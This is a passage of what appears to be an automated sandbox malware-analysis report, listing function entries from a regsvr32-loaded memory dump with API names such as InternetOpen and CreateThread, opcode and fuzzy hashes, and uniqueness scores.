• Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
• Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InternetOpen
                                                                                                                                • String ID: :G?
                                                                                                                                • API String ID: 2038078732-1508054202
                                                                                                                                • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                                                                                • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                                                                                • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                                                                                • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%